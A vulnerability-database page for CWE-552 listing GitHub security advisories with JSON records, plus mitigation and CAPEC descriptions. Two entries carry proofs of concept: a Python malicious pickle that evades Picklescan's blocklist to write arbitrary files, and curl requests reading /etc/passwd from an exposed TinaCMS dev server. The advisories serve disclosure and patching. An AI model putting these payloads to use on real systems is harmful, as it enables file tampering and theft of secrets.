Common Weakness Enumeration

CWE-552

Allowed

Files or Directories Accessible to External Parties

Abstraction: Base · Status: Draft

The product makes files or directories accessible to unauthorized actors, even though they should not be.

670 vulnerabilities reference this CWE, most recent first.

GHSA-M273-6V24-X4M4

Vulnerability from github – Published: 2025-12-29 15:22 – Updated: 2026-06-18 14:44
VLAI
Summary
Picklescan vulnerable to Arbitrary File Writing
Details

Summary

Picklescan has got open() and shutil in its default dangerous blocklist to prevent arbitrary file overwrites. However the module distutils isnt blocked and can be used for the same purpose ie to write arbitrary files.

Details

This is another vulnerability which impacts the downstream user.

By constructing a pickle that user distutils.file_util.write_file, an attacker can overwrite critical system files (like .ssh/authorized_keys, web server configurations, or source code) to achieve DoS or escalate to RCE.

PoC

import pickle
import distutils.file_util

class FileWriteBypass:
    def __reduce__(self):

        target_file = "pwned_config.env"
        content = ["print('I have overwritten your config')"]

        return (distutils.file_util.write_file, (target_file, content))

payload = pickle.dumps(FileWriteBypass())
with open("bypass_filewrite.pkl", "wb") as f:
    f.write(payload)

print("bypass_filewrite.pkl")

image

To fix this just add disutil to the blacklist

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "picklescan"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.0.33"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-71321"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-502",
      "CWE-552"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-12-29T15:22:30Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "### Summary\nPicklescan has got open() and shutil in its default dangerous blocklist to prevent arbitrary file overwrites. However the module distutils isnt blocked and can be used for the same purpose ie to write arbitrary files.\n\n### Details\nThis is another vulnerability which impacts the downstream user.\n\nBy constructing a pickle that user distutils.file_util.write_file, an attacker can overwrite critical system files (like .ssh/authorized_keys, web server configurations, or source code) to achieve DoS or escalate to RCE.\n\n### PoC\n```python\nimport pickle\nimport distutils.file_util\n\nclass FileWriteBypass:\n    def __reduce__(self):\n        \n        target_file = \"pwned_config.env\"\n        content = [\"print(\u0027I have overwritten your config\u0027)\"]\n        \n        return (distutils.file_util.write_file, (target_file, content))\n\npayload = pickle.dumps(FileWriteBypass())\nwith open(\"bypass_filewrite.pkl\", \"wb\") as f:\n    f.write(payload)\n\nprint(\"bypass_filewrite.pkl\")\n```\n\n\u003cimg width=\"853\" height=\"197\" alt=\"image\" src=\"https://github.com/user-attachments/assets/a129f5aa-a050-4e88-adb7-5a6f93e35b65\" /\u003e\n\nTo fix this just add disutil to the blacklist",
  "id": "GHSA-m273-6v24-x4m4",
  "modified": "2026-06-18T14:44:27Z",
  "published": "2025-12-29T15:22:30Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-m273-6v24-x4m4"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-71321"
    },
    {
      "type": "WEB",
      "url": "https://github.com/mmaitre314/picklescan/pull/53"
    },
    {
      "type": "WEB",
      "url": "https://github.com/mmaitre314/picklescan/commit/70c1c6c31beb6baaf52c8db1b6c3c0e84a6f9dab"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/mmaitre314/picklescan"
    },
    {
      "type": "WEB",
      "url": "https://github.com/mmaitre314/picklescan/releases/tag/v0.0.33"
    },
    {
      "type": "WEB",
      "url": "https://www.vulncheck.com/advisories/picklescan-arbitrary-file-writing-via-distutils-module-bypass"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Picklescan vulnerable to Arbitrary File Writing"
}

GHSA-M2MX-4JC6-3WH7

Vulnerability from github – Published: 2022-05-13 01:08 – Updated: 2022-05-13 01:08
VLAI
Details

The VFS subsystem in the Linux kernel 3.x provides an incomplete set of requirements for setattr operations that underspecifies removing extended privilege attributes, which allows local users to cause a denial of service (capability stripping) via a failed invocation of a system call, as demonstrated by using chown to remove a capability from the ping or Wireshark dumpcap program.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2015-1350"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-552"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2016-05-02T10:59:00Z",
    "severity": "MODERATE"
  },
  "details": "The VFS subsystem in the Linux kernel 3.x provides an incomplete set of requirements for setattr operations that underspecifies removing extended privilege attributes, which allows local users to cause a denial of service (capability stripping) via a failed invocation of a system call, as demonstrated by using chown to remove a capability from the ping or Wireshark dumpcap program.",
  "id": "GHSA-m2mx-4jc6-3wh7",
  "modified": "2022-05-13T01:08:47Z",
  "published": "2022-05-13T01:08:47Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-1350"
    },
    {
      "type": "WEB",
      "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=770492"
    },
    {
      "type": "WEB",
      "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1185139"
    },
    {
      "type": "WEB",
      "url": "http://marc.info/?l=linux-kernel\u0026m=142153722930533\u0026w=2"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2015/01/24/5"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/76075"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-M3F3-PC2W-56JQ

Vulnerability from github – Published: 2023-09-27 15:30 – Updated: 2024-04-04 07:54
VLAI
Details

Dreamer CMS v4.1.3 was discovered to contain an arbitrary file read vulnerability via the component /admin/TemplateController.java.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-43856"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-552"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-09-27T15:19:34Z",
    "severity": "HIGH"
  },
  "details": "Dreamer CMS v4.1.3 was discovered to contain an arbitrary file read vulnerability via the component /admin/TemplateController.java.",
  "id": "GHSA-m3f3-pc2w-56jq",
  "modified": "2024-04-04T07:54:57Z",
  "published": "2023-09-27T15:30:38Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-43856"
    },
    {
      "type": "WEB",
      "url": "https://github.com/yux1azhengye"
    },
    {
      "type": "WEB",
      "url": "https://github.com/yux1azhengye/mycve/blob/main/DreamerCMS%20arbitrary%20file%20reading.pdf"
    },
    {
      "type": "WEB",
      "url": "http://cms.iteachyou.cc"
    },
    {
      "type": "WEB",
      "url": "http://dreamer.com"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-M3X3-92M3-68HJ

Vulnerability from github – Published: 2022-10-14 19:00 – Updated: 2022-10-17 19:00
VLAI
Details

There is a file inclusion vulnerability in the template management module in UCMS 1.6

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-42234"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-552"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-10-14T17:15:00Z",
    "severity": "HIGH"
  },
  "details": "There is a file inclusion vulnerability in the template management module in UCMS 1.6",
  "id": "GHSA-m3x3-92m3-68hj",
  "modified": "2022-10-17T19:00:25Z",
  "published": "2022-10-14T19:00:23Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-42234"
    },
    {
      "type": "WEB",
      "url": "https://github.com/luoyangchangan/bug/issues/1"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-M48G-4WR2-J2H6

Vulnerability from github – Published: 2026-03-12 20:32 – Updated: 2026-03-12 20:32
VLAI
Summary
TinaCMS CLI has Arbitrary File Read via Disabled Vite Filesystem Restriction
Details

Summary

The TinaCMS CLI dev server configures Vite with server.fs.strict: false, which disables Vite's built-in filesystem access restriction. This allows any unauthenticated attacker who can reach the dev server to read arbitrary files on the host system

Details

When running tinacms dev, the CLI starts a Vite dev server configured in: packages/@tinacms/cli/src/next/vite/index.ts

server: {
  host: configManager.config?.build?.host ?? false,
  ...
  fs: {
    strict: false, // Disables Vite's filesystem access restriction
  },
},

TinaCMS middleware only intercepts specific route prefixes (/media/*, /graphql, /altair, /searchIndex). Any request to a path outside these routes falls through to Vite's default static file handler, which will serve the file directly from the absolute path on the filesystem. Additionally, the server enables permissive CORS (cors() with no origin restriction), which may further facilitate browser-based exploitation such as DNS rebinding attacks.

PoC

Prerequisites: TinaCMS CLI dev server running (default port 4001).

  • Read system files directly:
curl http://localhost:4001/etc/passwd

image

curl http://localhost:4001/etc/hostname

image Vite resolves and serves the absolute path directly from the filesystem.

Impact

Any developer running tinacms dev in an environment where the dev server port is reachable by an attacker. This includes:

  • Cloud IDEs (GitHub Codespaces, Gitpod) where ports are automatically forwarded and publicly accessible

  • Docker or VM setups with port forwarding configured

  • Misconfigured environments binding to 0.0.0.0 via the build.host config option

  • Systems targeted via DNS rebinding attacks, leveraging the unrestricted CORS policy

  • Local environments with malicious dependencies running on the same machine

An attacker who can reach port 4001 can:

  • Read any file readable by the server process (/etc/passwd, /etc/shadow, SSH private keys)

  • Exfiltrate environment variables and secrets via /proc/self/environ

  • Access cloud credentials and API keys from configuration files

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "@tinacms/cli"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.1.8"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-29066"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-200",
      "CWE-552"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-12T20:32:43Z",
    "nvd_published_at": "2026-03-12T17:16:50Z",
    "severity": "MODERATE"
  },
  "details": "## Summary\nThe TinaCMS CLI dev server configures Vite with `server.fs.strict: false`, which disables Vite\u0027s built-in filesystem access restriction. This allows any unauthenticated attacker who can reach the dev server to read arbitrary files on the host system\n\n## Details\nWhen running `tinacms dev`, the CLI starts a Vite dev server configured in:\n`packages/@tinacms/cli/src/next/vite/index.ts`\n```\nserver: {\n  host: configManager.config?.build?.host ?? false,\n  ...\n  fs: {\n    strict: false, // Disables Vite\u0027s filesystem access restriction\n  },\n},\n```\nTinaCMS middleware only intercepts specific route prefixes (/media/*, /graphql, /altair, /searchIndex). Any request to a path outside these routes falls through to Vite\u0027s default static file handler, which will serve the file directly from the absolute path on the filesystem.\nAdditionally, the server enables permissive CORS (cors() with no origin restriction), which may further facilitate browser-based exploitation such as DNS rebinding attacks.\n\n## PoC\n\n**Prerequisites**: TinaCMS CLI dev server running (default port 4001).\n\n- Read system files directly:\n```\ncurl http://localhost:4001/etc/passwd\n```\n\u003cimg width=\"705\" height=\"332\" alt=\"image\" src=\"https://github.com/user-attachments/assets/6fd0e1c7-a549-40c8-bc81-af9c343f52a0\" /\u003e\n\n```\ncurl http://localhost:4001/etc/hostname\n```\n\u003cimg width=\"631\" height=\"41\" alt=\"image\" src=\"https://github.com/user-attachments/assets/bd103dc3-d4c3-4774-8007-b55de3fc2a9e\" /\u003e\nVite resolves and serves the absolute path directly from the filesystem.\n\n\n## Impact\nAny developer running tinacms dev in an environment where the dev server port is reachable by an attacker. This includes:\n\n- Cloud IDEs (GitHub Codespaces, Gitpod) where ports are automatically forwarded and publicly accessible\n\n- Docker or VM setups with port forwarding configured\n\n- Misconfigured environments binding to 0.0.0.0 via the build.host config option\n\n- Systems targeted via DNS rebinding attacks, leveraging the unrestricted CORS policy\n\n- Local environments with malicious dependencies running on the same machine\n\nAn attacker who can reach port 4001 can:\n\n- Read any file readable by the server process (/etc/passwd, /etc/shadow, SSH private keys)\n\n- Exfiltrate environment variables and secrets via /proc/self/environ\n\n- Access cloud credentials and API keys from configuration files",
  "id": "GHSA-m48g-4wr2-j2h6",
  "modified": "2026-03-12T20:32:43Z",
  "published": "2026-03-12T20:32:43Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/tinacms/tinacms/security/advisories/GHSA-m48g-4wr2-j2h6"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29066"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/tinacms/tinacms"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "TinaCMS CLI has Arbitrary File Read via Disabled Vite Filesystem Restriction"
}

GHSA-M4XJ-RMH7-H46M

Vulnerability from github – Published: 2022-05-24 19:11 – Updated: 2022-05-24 19:11
VLAI
Details

Nagios XI before version 5.8.5 is vulnerable to local file inclusion through improper limitation of a pathname in index.php.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-37348"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-552"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-08-13T12:15:00Z",
    "severity": "HIGH"
  },
  "details": "Nagios XI before version 5.8.5 is vulnerable to local file inclusion through improper limitation of a pathname in index.php.",
  "id": "GHSA-m4xj-rmh7-h46m",
  "modified": "2022-05-24T19:11:08Z",
  "published": "2022-05-24T19:11:08Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-37348"
    },
    {
      "type": "WEB",
      "url": "https://www.nagios.com/downloads/nagios-xi/change-log"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-M54Q-G6PW-5JV7

Vulnerability from github – Published: 2022-05-13 01:42 – Updated: 2022-05-13 01:42
VLAI
Details

Tenshi 0.15 creates a tenshi.pid file after dropping privileges to a non-root account, which might allow local users to kill arbitrary processes by leveraging access to this non-root account for tenshi.pid modification before a root script executes a "kill cat /pathname/tenshi.pid" command.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2017-11746"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-552"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2017-07-30T16:29:00Z",
    "severity": "HIGH"
  },
  "details": "Tenshi 0.15 creates a tenshi.pid file after dropping privileges to a non-root account, which might allow local users to kill arbitrary processes by leveraging access to this non-root account for tenshi.pid modification before a root script executes a \"kill `cat /pathname/tenshi.pid`\" command.",
  "id": "GHSA-m54q-g6pw-5jv7",
  "modified": "2022-05-13T01:42:29Z",
  "published": "2022-05-13T01:42:29Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-11746"
    },
    {
      "type": "WEB",
      "url": "https://github.com/inversepath/tenshi/issues/6"
    },
    {
      "type": "WEB",
      "url": "https://security.gentoo.org/glsa/201804-18"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-M5XF-MWC4-9WPV

Vulnerability from github – Published: 2022-05-24 19:03 – Updated: 2022-08-06 00:00
VLAI
Details

It has been discovered that redhat-certification is not properly configured and it lists all files and directories in the /var/www/rhcert/store/transfer directory through the /rhcert-transfer URL. An unauthorized attacker may use this flaw to gather sensible information. This flaw affects redhat-certification version 7.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2018-10863"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-552"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-05-26T19:15:00Z",
    "severity": "HIGH"
  },
  "details": "It has been discovered that redhat-certification is not properly configured and it lists all files and directories in the /var/www/rhcert/store/transfer directory through the /rhcert-transfer URL. An unauthorized attacker may use this flaw to gather sensible information. This flaw affects redhat-certification version 7.",
  "id": "GHSA-m5xf-mwc4-9wpv",
  "modified": "2022-08-06T00:00:44Z",
  "published": "2022-05-24T19:03:19Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-10863"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/security/cve/CVE-2018-10863"
    },
    {
      "type": "WEB",
      "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1594122"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-M7Q8-MVMC-97P3

Vulnerability from github – Published: 2026-05-12 18:30 – Updated: 2026-05-12 18:30
VLAI
Details

Files or directories accessible to external parties in Microsoft Office Word allows an unauthorized attacker to disclose information locally.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-35440"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-552"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-05-12T18:17:14Z",
    "severity": "MODERATE"
  },
  "details": "Files or directories accessible to external parties in Microsoft Office Word allows an unauthorized attacker to disclose information locally.",
  "id": "GHSA-m7q8-mvmc-97p3",
  "modified": "2026-05-12T18:30:44Z",
  "published": "2026-05-12T18:30:44Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35440"
    },
    {
      "type": "WEB",
      "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-35440"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-M8GQ-83GH-V42V

Vulnerability from github – Published: 2022-03-16 00:00 – Updated: 2022-03-18 23:52
VLAI
Summary
XML External Entities Vulnerability in CVRF-CSAF-Converter
Details

CVRF-CSAF-Converter before 1.0.0-rc2 resolves XML External Entities (XXE). This leads to the inclusion of arbitrary (local) file content into the generated output document. An attacker can exploit this to disclose information from the system running the converter.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 1.0.0rc1"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "cvrf2csaf"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.0.0rc2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2022-27193"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-552",
      "CWE-611"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2022-03-18T23:52:30Z",
    "nvd_published_at": "2022-03-15T05:15:00Z",
    "severity": "MODERATE"
  },
  "details": "CVRF-CSAF-Converter before 1.0.0-rc2 resolves XML External Entities (XXE). This leads to the inclusion of arbitrary (local) file content into the generated output document. An attacker can exploit this to disclose information from the system running the converter.",
  "id": "GHSA-m8gq-83gh-v42v",
  "modified": "2022-03-18T23:52:30Z",
  "published": "2022-03-16T00:00:49Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-27193"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/csaf-tools/CVRF-CSAF-Converter"
    },
    {
      "type": "WEB",
      "url": "https://github.com/csaf-tools/CVRF-CSAF-Converter/releases/tag/1.0.0-rc2"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "XML External Entities Vulnerability in CVRF-CSAF-Converter"
}

Mitigation
Implementation System Configuration Operation

When storing data in the cloud (e.g., S3 buckets, Azure blobs, Google Cloud Storage, etc.), use the provider's controls to disable public access.

CAPEC-150: Collect Data from Common Resource Locations

An adversary exploits well-known locations for resources for the purposes of undermining the security of the target. In many, if not most systems, files and resources are organized in a default tree structure. This can be useful for adversaries because they often know where to look for resources or files that are necessary for attacks. Even when the precise location of a targeted resource may not be known, naming conventions may indicate a small area of the target machine's file tree where the resources are typically located. For example, configuration files are normally stored in the /etc director on Unix systems. Adversaries can take advantage of this to commit other types of attacks.

CAPEC-639: Probe System Files

An adversary obtains unauthorized information due to improperly protected files. If an application stores sensitive information in a file that is not protected by proper access control, then an adversary can access the file and search for sensitive information.